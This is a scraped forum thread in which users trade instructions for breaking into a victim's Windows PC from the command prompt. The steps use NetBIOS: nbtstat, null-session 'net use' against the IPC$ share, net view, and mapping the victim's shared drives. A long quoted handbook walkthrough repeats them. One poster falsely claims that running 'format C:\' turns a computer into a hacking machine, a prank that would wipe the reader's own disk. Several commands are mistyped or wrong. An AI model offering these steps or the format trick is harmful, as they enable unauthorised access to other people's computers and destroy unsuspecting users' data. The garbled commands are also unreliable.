Hacking a pc with cmd
i know a site but that is in dutch i try to explain in english
first of all you need to know the victim his password
e.g 534.81.96.31 (this is fake)
ypu open cmd and type:
NBTSTAT -AN @
on the @ you need to paste the ip of your victim
then type
NET USE \@IPC$
also here on the @ you need to paste the ip of your victim
the finally type:
START \@IPC$
and also here drop the ip of your victim
if everything is goiing well you are now in the computer of your victim you can now make maps and other things by using cmd commands
ATTENTION:
i'am not responsable for the things you do
this method is not anonymous and you can
be detected don’t try this with webstites
because you will end up in prison then
greets unidentified hacker
the quieter you come, the more you able to hear
the quieter you come, the more you able to hear
Can someone please post, what exactly I’ll have to type in for this??
adniloxd wrote, this is correct:
net use \@IPC$
start \@IPC$```
But it isn't working at all
shouldn't it be like this?:
net start \534.81.96.31\IPC$```
I’m not sure about that.
So if it has worked for you, please post what u typed in, thx!
Miep…
[quote=Hackers Underground Handbook by David Melnichuk]7. Open the Command Prompt by going to Start -> Run -> Type in cmd -> .
Now the hacker would run the nbtstat a TargetIPaddress this will tell us if the target has file and printing enabled. Without it, this attack is not possible.
In the above image DAVIDS-MACHINE is the name of the target computer. If you look to the right of it you will see the number <20>. This means that file and printer sharing is enabled. If there was no <20> then you could not go any further and would have to find a new target.
Next the hacker would run the command net view \TargetIPaddress. This command will display any shared drives, folders, files or printers. If nothing comes up, you wont be able to gain access to anything since there is nothing being shared. In my case, I got the following:
In my example, I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk.
To gain access to my SharedDocs disk, the hacker would have to map out the drive onto his computer. If successful, the hacker will have all the contents of my drive on his computer.
To map out my drive onto his computer the hacker would use the command net use G: \TargetIPaddress\DriveName. So in my case I would run the command net use G:\192.168.1.101\SharedDocs. You can use any letter in place of G:\. This just tells the computer what to name the drive on your computer.
Whats this? Looks like I already have a drive G. To avoid this problem, go to My Computer where it will show all of your current Drives. To fix this simply change the letter G to a nonexistent drive letter.
Once the command is completed successfully, go to My Computer and you should see a new drive[/quote]
Miep…
[quote=7OWN3D7]Hello, you have anwsered my question about how to gain acces to a pc with just cmd. But I also need to know how to break the connection agian;)[/quote]
Well I’m not sure about that xD
But I’ll upload the whole HackersUndergroundHandbook so you can look it up ;)
Miep…
11 years ago | edited 11 years ago
0
Hey HUNON it’s not NETVIEW it is NET VIEW Don’t forget the space mate. :)
nbtstat a Lists the Remote Machines Name - nbtstat A Lists the Remote Machines IP Address"
By default we would not have permissions to list the shares. If we map the IPC$ share (Inter Process Communications) using our NULL username and password combinations we are successful:
C:\tools>net use \MY.SUB.NET.IP\IPC$ “” /u:“”
The command completed successfully.
C:\tools>net view \MY.SUB.NET.IP
Hope this will help you
You type in “format C:\” then enter “y” and wait 30 minutes and your computer will be changed into a computer that can hack anything by entering the IP address for a remote connection.
~ White Shadow ~
just a 13 year old kid.
11 years ago | edited 11 years ago
1
No problem HUNON you are welcome mate :)
Don’t take the format C:\ stuff to heart only an idiot would fall for that one. If you want another one
try this: format C: /fs:NTFS /p:2 this could really mess things up by writing zeros to your C:\ Drive twice.
No don’t try it but you can use it to wipe any other drives on your machine that you want wiping.
Say you wanted to wipe drive E:\ just type in on the CMD prompt: format e: /fs:NTFS /p:2 and it will
fill the drive with zeros and format it clean.
So I thought this might cheer everyone up!
Hove a good one guys! :)
P.S. I forgot to mention. Here is a FREE disc wiping software you run from a floppy drive
and will destroy the data on a disc quite quickly but just for emergencies.
Darik’s Boot and Nuke (“DBAN”) is a self-contained boot floppy that securely wipes the hard
disks of most computers. DBAN is appropriate for bulk or emergency data destruction.
direct link - mirror
CMD prompt: format e: /fs:NTFS /p:1,2,3,4,5,6 - My next step
I went a little overboard on the partitions this weekend lol.
Need help with math homework? Hit me up! I can help out with integral calculus and below.
You must find someone with no firewall to exploit NetBios… I can’t think of an admin letting this protocol going wild over the Net…
Just because I am paranoid doesnt mean theyre not after me…
10 years ago
0
@axil : Hey check this out. Also you can get similar videos on Youtube. All you need to do is search.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1